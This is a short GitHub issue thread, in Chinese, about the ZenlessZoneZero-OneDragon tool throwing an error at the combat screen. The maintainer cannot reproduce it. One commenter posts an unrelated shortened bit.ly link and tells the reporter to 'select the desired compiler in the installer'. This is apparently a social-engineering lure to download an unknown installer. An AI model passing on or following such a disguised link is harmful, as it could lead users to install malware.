### ISSUE TITLE
[问题反馈] [通用] 运行一条龙进行到战斗界面报错

### ISSUE THREAD

**Issue by smallmj** [DoctorReid/ZenlessZoneZero-OneDragon#137]
### 问题描述

运行一条龙进行到战斗界面报错
[bat_8.18.33.95.log](https://github.com/user-attachments/files/16842096/bat_8.18.33.95.log)

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by DoctorReid** [comment]
没法重现

**Comment by smallmj** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

打不开这个链接
